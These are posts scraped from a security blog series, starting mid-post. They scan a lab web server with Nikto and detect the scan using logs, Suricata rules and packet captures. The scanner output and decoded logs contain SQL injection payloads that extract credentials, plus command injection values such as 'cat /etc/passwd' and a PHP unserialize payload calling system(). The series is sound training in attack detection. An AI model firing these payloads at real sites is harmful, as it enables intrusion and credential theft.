</div><div><br /></div><div><div>We can see that this ties in above with the other network based traffic, especially when we focus on TCP port 47986.</div><div><br /></div><div>Peeking a bit more into this php traffic.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ cat alert-debug.log | grep ".php"</span>
<span style="color: white;"> 03C0 63 61 74 69 6F 6E 2F 78 2D 70 68 70 0D 0A 0D 0A cation/x -php....</span>
<span style="color: white;"> 03D0 2F 2A 3C 3F 70 68 70 20 2F 2A 2A 2F 20 65 72 72 /*<?php /**/ err</span>
<span style="color: white;"> 0370 2E 70 68 70 22 0D 0A 43 6F 6E 74 65 6E 74 2D 54 .php"..C ontent-T</span>
<span style="color: white;"> 0390 2F 78 2D 70 68 70 0D 0A 0D 0A 2F 2A 3C 3F 70 68 /x-php.. ../*<?ph</span>
<span style="color: white;"> 0370 2E 70 68 70 22 0D 0A 43 6F 6E 74 65 6E 74 2D 54 .php"..C ontent-T</span>
<span style="color: white;"> 0390 2F 78 2D 70 68 70 0D 0A 0D 0A 2F 2A 3C 3F 70 68 /x-php.. ../*<?ph</span>
</pre></div>
</div><div><br /></div><div>Well I'm going to close off for now.</div><div><br /></div><div><b>Hope you enjoyed the posts in this series:</b></div><div><div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-scanning-for.html" target="_blank">Beginning Nikto - Scanning for interesting files seen in the logs</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-misconfiguration.html" target="_blank">Beginning Nikto - Misconfiguration / Default File - with evasion type 1 -> Random URI encoding (non-UTF8)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Information Disclosure with evasion type 2 -> Directory self-reference (/./)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Injection (XSS/Script/HTML) - with evasion type 3 -> Premature URL ending</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Remote File Retrieval with evasion type 4 -> Prepend long random string</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Command Execution / Remote Shell</a> </div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - SQL Injection with default evasion</a> </div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - File Upload Vulnerability testing</a></div></div><div><br /></div><div><br /><b>References:</b></div><div><a href="https://dtwh.medium.com/damn-vulnerable-web-application-dvwa-file-upload-walkthrough-bbb9743080cc">https://dtwh.medium.com/damn-vulnerable-web-application-dvwa-file-upload-walkthrough-bbb9743080cc</a></div><div><a href="https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/php/meterpreter/reverse_tcp.md">https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/php/meterpreter/reverse_tcp.md</a></div><div><a href="https://www.hackingarticles.in/hack-file-upload-vulnerability-dvwa-bypass-security/">https://www.hackingarticles.in/hack-file-upload-vulnerability-dvwa-bypass-security/</a></div><div><a href="https://docs.rapid7.com/metasploit/resource-scripts/">https://docs.rapid7.com/metasploit/resource-scripts/</a></div><div><a href="https://portswigger.net/web-security/file-upload">https://portswigger.net/web-security/file-upload</a></div></div><div><br /></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-62751176883900769192023-12-12T18:29:00.000-08:002023-12-12T18:36:28.484-08:00Beginning Nikto - SQL Injection with default evasion<p>This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the <a href="https://www.amazon.com/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458" target="_blank">hack and its detection</a>. </p><p>From the hacking perspective, Nikto is the tool used. From detection perspective, the tools and or processed used for the network forensics are log analysis, TShark, Zeek and Suricata.<br /><br /></p><p><b><span style="font-size: medium;">The Hack - SQL Injection with default evasion.</span></b></p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9]</span>
<span style="color: white;">└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -nossl -no404 -Tuning 9</span>
<span style="color: white;">- Nikto v2.5.0</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Target IP: 10.0.0.106</span>
<span style="color: white;">+ Target Hostname: 10.0.0.106</span>
<span style="color: white;">+ Target Port: 80</span>
<span style="color: white;">+ Start Time: 2023-06-09 14:09:20 (GMT-4)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28</span>
<span style="color: white;">+ /cgi.cgi/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options</span>
<span style="color: white;">+ /cgi.cgi/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/</span>
<span style="color: white;">+ /: Retrieved x-powered-by header: PHP/8.0.28.</span>
<span style="color: white;">+ PHP/8.0.28 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.</span>
<span style="color: white;">+ OpenSSL/1.1.1t appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.</span>
<span style="color: white;">+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing</span>
<span style="color: white;">+ /index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/* - Redirects (302) to http://10.0.0.106/dashboard/ , My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.</span>
<span style="color: white;">....</span>
<span style="color: white;">/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(session_id))%20FROM%20jml_session%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) - Redirects (302) to http://10.0.0.106/dashboard/ , Joomla is vulnerable to a SQL injection which can lead to administrator access. https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0</span>
<span style="color: white;">+ 783 requests: 0 error(s) and 6 item(s) reported on remote host</span>
<span style="color: white;">+ End Time: 2023-06-09 14:09:22 (GMT-4) (2 seconds)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ 1 host(s) tested</span>
</pre></div>
<br /><div>Once again, <i>index.php</i> does not have most of the parameters that Nikto is reporting as vulnerable. What do I make of the output from the tool. I make that it is time for me to move on.</div><div><br /></div><div>See here for more guidance on SQL Injection: or </div><a href="https://www.securitynik.com/2017/02/beginning-web-application-testing-sql.html">Learning by practicing: Beginning Web Application Testing: SQL Injection - Mutillidae (securitynik.com)</a><br /><a href="https://www.securitynik.com/2020/07/continuing-sql-injection-with-sqlmap.html">Learning by practicing: Continuing SQL Injection with SQLMap - Exploitation (securitynik.com)</a><br /><br /><br /><div><b><span style="font-size: medium;">Detect - Log Analysis</span></b></div><div><br /></div><div><div>Quick log analysis says most of this activity is a waste of time. First most of the parameters targeted here does not exist on <i>index.php page</i>. We know this from the previous posts in this series. Second their is no <i>request.php </i>file.</div><div><br /></div><div>I've lost interest. Maybe need to do the test from another perspective.<br /><br />See this link for for assistance with detecting SQL injection in your infrastructure.</div><div><a href="https://www.securitynik.com/2017/02/beginning-web-application-testing_15.html">Learning by practicing: Beginning Web Application Testing: Detecting SQL Injection - Mutillidae (securitynik.com)</a></div><div><br /></div><div><br /></div></div><div><span style="font-size: medium;"><b>Detect - Suricata (IDS) Analysis</b></span></div><div><div><br /></div></div><div><div>Setup Suricata to operate in IDS mode</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all</span>
</pre></div>
</div><div><br /></div><div><div>What does the IDS see</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9]</span>
<span style="color: white;">└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5</span>
<span style="color: white;"> 35 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt </span>
<span style="color: white;"> 14 1:2021390:3] ET WEB_SPECIFIC_APPS WEB-PHP RCE PHPBB 2004-1315 </span>
<span style="color: white;"> 6 1:2006445:14] ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM </span>
<span style="color: white;"> 5 1:2006446:14] ET WEB_SERVER Possible SQL Injection Attempt UNION SELECT </span>
<span style="color: white;"> 4 1:2011042:6] ET WEB_SERVER MYSQL SELECT CONCAT SQL Injection Attempt </span>
</pre></div>
</div><div><br /></div><div><br /></div><div><div>See 3 unique alerts for SQL injection attempt. Find the associated rules:</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9]</span>
<span style="color: white;">└─$ grep --perl-regexp "2006445|2006446|2011042" /var/lib/suricata/rules/suricata.rules </span>
<span style="color: white;">alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM"; flow:established,to_server; http.uri; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:url,en.wikipedia.org/wiki/SQL_injection; reference:url,doc.emergingthreats.net/2006445; classtype:web-application-attack; sid:2006445; rev:14; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_05_01;)</span>
<span style="color: white;">alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible SQL Injection Attempt UNION SELECT"; flow:established,to_server; http.uri; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:url,en.wikipedia.org/wiki/SQL_injection; reference:url,doc.emergingthreats.net/2006446; classtype:web-application-attack; sid:2006446; rev:14; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_09_01;)</span>
<span style="color: white;">alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER MYSQL SELECT CONCAT SQL Injection Attempt"; flow:established,to_server; http.uri; content:"SELECT"; nocase; content:"CONCAT"; nocase; pcre:"/SELECT.+CONCAT/i"; reference:url,ferruh.mavituna.com/sql-injection-cheatsheet-oku/; reference:url,www.webdevelopersnotes.com/tutorials/sql/a_little_more_on_the_mysql_select_statement.php3; reference:url,doc.emergingthreats.net/2011042; classtype:web-application-attack; sid:2011042; rev:6; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2020_09_14;)</span>
</pre></div>
</div><div><br /></div><div>Find an alert for "<i>2006445</i>"</div><div><br /></div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_9]</span>
<span style="color: white;">└─$ less alert-debug.log</span>
<span style="color: white;">ALERT CNT: 2</span>
<span style="color: white;">ALERT MSG [00]: ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM</span>
<span style="color: white;">ALERT GID [00]: 1</span>
<span style="color: white;">ALERT SID [00]: 2006445</span>
<span style="color: white;">ALERT REV [00]: 14</span>
<span style="color: white;">ALERT CLASS [00]: Web Application Attack</span>
<span style="color: white;">ALERT PRIO [00]: 1</span>
<span style="color: white;">ALERT FOUND IN [00]: STATE</span>
<span style="color: white;">ALERT IN TX [00]: 34</span>
<span style="color: white;">PAYLOAD LEN: 316</span>
<span style="color: white;">PAYLOAD:</span>
<span style="color: white;"> 0000 47 45 54 20 2F 73 69 74 65 2F 27 25 32 30 55 4E GET /sit e/'%20UN</span>
<span><span style="color: white;"> 0010 49 4F 4E 25 32 30 41 4C 4C 25 32 30 </span><b><span style="color: #fcff01;">53 45 4C 45</span></b><span style="color: white;"> ION%20AL L%20</span><span style="color: #fcff01;"><b>SELE</b></span></span>
<span><span style="color: white;"> 0020 </span><b><span style="color: #fcff01;">43 54</span></b><span style="color: white;"> 25 32 30 46 69 6C 65 54 6F 43 6C 6F 62 28 </span><b><span style="color: #fcff01;">CT</span></b><span style="color: white;">%20Fil eToClob(</span></span>
<span style="color: white;"> 0030 27 2F 65 74 63 2F 70 61 73 73 77 64 27 2C 27 73 '/etc/pa sswd','s</span>
<span style="color: white;"> 0040 65 72 76 65 72 27 29 3A 3A 68 74 6D 6C 2C 30 25 erver'): :html,0%</span>
<span><span style="color: white;"> 0050 32 30 </span><b><span style="color: #fcff01;">46 52 4F 4D</span></b><span style="color: white;"> 25 32 30 73 79 73 75 73 65 72 20</span><b><span style="color: #fcff01;">FROM</span></b><span style="color: white;">%2 0sysuser</span></span>
<span style="color: white;"> 0060 73 25 32 30 57 48 45 52 45 25 32 30 75 73 65 72 s%20WHER E%20user</span>
<span style="color: white;"> 0070 6E 61 6D 65 3D 55 53 45 52 25 32 30 2D 2D 2F 2E name=USE R%20--/.</span>
<span style="color: white;"> 0080 68 74 6D 6C 20 48 54 54 50 2F 31 2E 31 0D 0A 55 html HTT P/1.1..U</span>
<span style="color: white;"> 0090 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C ser-Agen t: Mozil</span>
<span style="color: white;"> 00A0 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 la/5.0 ( Windows </span>
<span style="color: white;"> 00B0 4E 54 20 31 30 2E 30 3B 20 57 69 6E 36 34 3B 20 NT 10.0; Win64; </span>
<span style="color: white;"> 00C0 78 36 34 29 20 41 70 70 6C 65 57 65 62 4B 69 74 x64) App leWebKit</span>
<span style="color: white;"> 00D0 2F 35 33 37 2E 33 36 20 28 4B 48 54 4D 4C 2C 20 /537.36 (KHTML, </span>
<span style="color: white;"> 00E0 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72 6F like Gec ko) Chro</span>
<span style="color: white;"> 00F0 6D 65 2F 37 34 2E 30 2E 33 37 32 39 2E 31 36 39 me/74.0. 3729.169</span>
<span style="color: white;"> 0100 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 0D 0A Safari/ 537.36..</span>
<span style="color: white;"> 0110 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 Connecti on: Keep</span>
<span style="color: white;"> 0120 2D 41 6C 69 76 65 0D 0A 48 6F 73 74 3A 20 31 30 -Alive.. Host: 10</span>
<span style="color: white;"> 0130 2E 30 2E 30 2E 31 30 36 0D 0A 0D 0A .0.0.106 ....</span>
</pre></div>
</div><div><br /></div><div>That's it. Moving on.<br /><p></p></div><div><div><b>Hope you enjoyed the posts in this series:</b></div><div><div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-scanning-for.html" target="_blank">Beginning Nikto - Scanning for interesting files seen in the logs</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-misconfiguration.html" target="_blank">Beginning Nikto - Misconfiguration / Default File - with evasion type 1 -> Random URI encoding (non-UTF8)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Information Disclosure with evasion type 2 -> Directory self-reference (/./)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Injection (XSS/Script/HTML) - with evasion type 3 -> Premature URL ending</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Remote File Retrieval with evasion type 4 -> Prepend long random string</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Command Execution / Remote Shell</a> </div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - SQL Injection with default evasion</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - File Upload Vulnerability testing</a></div></div></div></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-77132757627439399722023-12-12T18:28:00.000-08:002023-12-12T18:36:49.772-08:00Beginning Nikto - Command Execution / Remote Shell <p>This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the <a href="https://www.amazon.com/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458" target="_blank">hack and its detection.</a> </p><p>From the hacking perspective, Nikto is the tool used. From detection perspective, the tools and or processed used for the network forensics are log analysis, TShark, Zeek and Suricata.</p><p><span style="font-size: medium;"><b>The Hack - Beginning Nikto - Command Execution / Remote Shell </b></span></p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]</span>
<span style="color: white;">└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -nossl -no404 -Tuning 8 </span>
<span style="color: white;">- Nikto v2.5.0</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Target IP: 10.0.0.106</span>
<span style="color: white;">+ Target Hostname: 10.0.0.106</span>
<span style="color: white;">+ Target Port: 80</span>
<span style="color: white;">+ Start Time: 2023-06-07 15:54:20 (GMT-4)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28</span>
<span style="color: white;">+ /cgi.cgi/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options</span>
<span style="color: white;">+ /cgi.cgi/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/</span>
<span style="color: white;">+ /: Retrieved x-powered-by header: PHP/8.0.28.</span>
<span style="color: white;">+ OpenSSL/1.1.1t appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.</span>
<span style="color: white;">+ PHP/8.0.28 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.</span>
<span style="color: white;">+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing</span>
<span style="color: white;">+ /index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 - Redirects (302) to http://10.0.0.106/dashboard/ , phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.</span>
<span style="color: white;">+ ...</span>
<span style="color: white;">+ /index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 - Redirects (302) to http://10.0.0.106/dashboard/ , phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.</span>
<span style="color: white;">+ /?-s - Redirects (302) to http://10.0.0.106/dashboard/ , PHP allows retrieval of the source code via the -s parameter, and may allow command execution.</span>
<span style="color: white;">+ 1074 requests: 0 error(s) and 6 item(s) reported on remote host</span>
<span style="color: white;">+ End Time: 2023-06-07 15:54:22 (GMT-4) (2 seconds)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ 1 host(s) tested</span>
</pre></div>
</div><div><br /></div><div><div>Looking at above, one may immediately draw the conclusion that this site is vulnerable. However, we know from our previous posts, the parameters referenced by <i>"index.php"</i> such as name, does not exist on this page.</div><div><br /></div><div>See here for more on attacking Command Injection: <i><br /></i><a href="https://www.securitynik.com/2017/02/beginning-web-application-testing-os.html">Learning by practicing: Beginning Web Application Testing: OS Command Injection - DVWA (securitynik.com)</a></div></div><div><br /></div><div><span style="font-size: medium;"><b>Detect - Log Analysis</b></span></div><div><br /></div><div><div>Jumping straight to the decoding of the URLs. Take a look at the first 7 lines with parameters that needs decoding.</div></div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]</span>
<span style="color: white;">└─$ cat access.log |grep --perl-regexp '\?.*?\s+HTTP' --only-matching | grep --invert-match "phpinfo" | cut --fields=2- --delimiter='?' | awk --field-separator='HTTP' '{ print $1 }' | sort --unique | head --lines=7</span>
<span style="color: white;">%0acat%0a/etc/passwd%0a </span>
<span style="color: white;">aaaaaaaa </span>
<span style="color: white;">action=load&whois=%3Bid </span>
<span style="color: white;">action=modify_user </span>
<span style="color: white;">APP=qmh-news&TEMPLATE=;ls%20/etc| </span>
<span style="color: white;">arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D </span>
<span style="color: white;">calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 </span>
</pre></div>
</div><div><br /></div><div>Decoding above and others via urldecode.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]</span>
<span style="color: white;">└─$ cat access.log |grep --perl-regexp '\?.*?\s+HTTP' --only-matching | grep --invert-match "phpinfo" | cut --fields=2- --delimiter='?' | awk --field-separator='HTTP' '{ print $1 }' | sort --unique | awk --field-separator=' ' '{ system("urlencode -d "$1) }'</span>
<span style="color: white;">...</span>
<span style="color: white;">aaaaaaaa</span>
<span style="color: white;">action=load</span>
<span style="color: white;">action=modify_user</span>
<span style="color: white;">alert-debug.log</span>
<span style="color: white;">arguments=O:12:"vB_dB_Result":2:{s:5:"</span>
<span style="color: white;">/bin/cat /etc/passwd</span>
<span style="color: white;">cat</span>
<span style="color: white;">cat /etc/hosts</span>
<span style="color: white;">cat /etc/passwd</span>
<span style="color: white;">cat /etc/passwd </span>
<span style="color: white;">/c dir</span>
<span style="color: white;">/c dir c:\</span>
<span style="color: white;">/c dir c:\"</span>
<span style="color: white;">/c dir /OG</span>
<span style="color: white;">cli=aa aa'cat /etc/hosts</span>
<span style="color: white;">cmd=cat /etc/passwd</span>
<span style="color: white;">cmd=dir c:\\</span>
<span style="color: white;">command=savesetup</span>
<span style="color: white;">conn.log</span>
<span style="color: white;">/c ver</span>
<span style="color: white;">data=Download</span>
<span style="color: white;">dns.log</span>
<span style="color: white;">email=x</span>
<span style="color: white;">/etc/passwd</span>
<span style="color: white;">_MAILTO=xx</span>
<span style="color: white;">message=test\</span>
<span style="color: white;">name=forums</span>
<span style="color: white;">name=Forums</span>
<span style="color: white;">name=Network_Tools</span>
<span style="color: white;">name=PNphpBB2</span>
<span style="color: white;">Nikto=forums</span>
<span style="color: white;">Nikto=Forums</span>
<span style="color: white;">pass= </span>
<span style="color: white;">process</span>
<span style="color: white;">QALIAS=x</span>
<span style="color: white;">Qname=root</span>
<span style="color: white;">QNikto=root</span>
<span style="color: white;">query=AAA</span>
<span style="color: white;">realname=aaa</span>
<span style="color: white;">realNikto=aaa</span>
<span style="color: white;">reporter.log</span>
<span style="color: white;">-s</span>
<span style="color: white;">sd=ls /etc</span>
<span style="color: white;">server=repserv report=/tmp/hacker.rdf destype=cache desformat=PDF</span>
<span style="color: white;">type=Library</span>
<span style="color: white;">-v</span>
<span style="color: white;">WSDL</span>
<span style="color: white;">xsl=/vcs/vcs_home.xsl&cat "/etc/passwd"&</span>
</pre></div>
</div><div><br /><div>We already know most of those parameters are non-existent. Additionally, the host running this webserver is Windows based on not Linux. </div><div><br /></div><div>See here for more on detecting command injection via logs.<br /><a href="https://www.securitynik.com/2017/02/beginning-web-application-testing_5.html">Learning by practicing: Beginning Web Application Testing: Detecting OS Command Injection - DVWA (securitynik.com)</a></div><div><br /></div><br /><b><span style="font-size: medium;">Detect - Packet Analysis</span></b></div><div><br />Setup for packet analysis. Capture packets on ports 80,443</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]</span>
<span style="color: white;">└─$tshark -n -w tuning_1.pcap -f 'tcp port(80 or 443)' --interface eth0</span>
</pre></div>
<br />Decoding the URLs from the packet data.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]</span>
<span style="color: white;">└─$ tshark -n -r tuning_8.pcap -Y 'http.request.method == "GET"' -T fields -e http.request.uri | grep --perl-regexp '\?.*' --only-matching | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">grep --invert-match "phpinfo" | cut --fields=2- --delimiter='?' | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">awk --field-separator='HTTP' '{ print $1 }' | sort --unique | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">awk --field-separator=' ' '{ system("urlencode -d "$1) }'</span>
<span style="color: white;">cat</span>
<span style="color: white;">/etc/passwd</span>
<span style="color: white;">aaaaaaaa</span>
<span style="color: white;">action=load</span>
<span style="color: white;">action=modify_user</span>
<span style="color: white;">cat /etc/passwd</span>
<span style="color: white;">cat /etc/hosts</span>
<span style="color: white;">/c dir</span>
<span style="color: white;">/c dir c:"</span>
<span style="color: white;">/c dir c:\</span>
<span style="color: white;">/c dir /OG </span>
<span style="color: white;">cli=aa aa'cat /etc/hosts </span>
<span style="color: white;">cmd=cat /etc/passwd </span>
<span style="color: white;">cmd=dir c:\ </span>
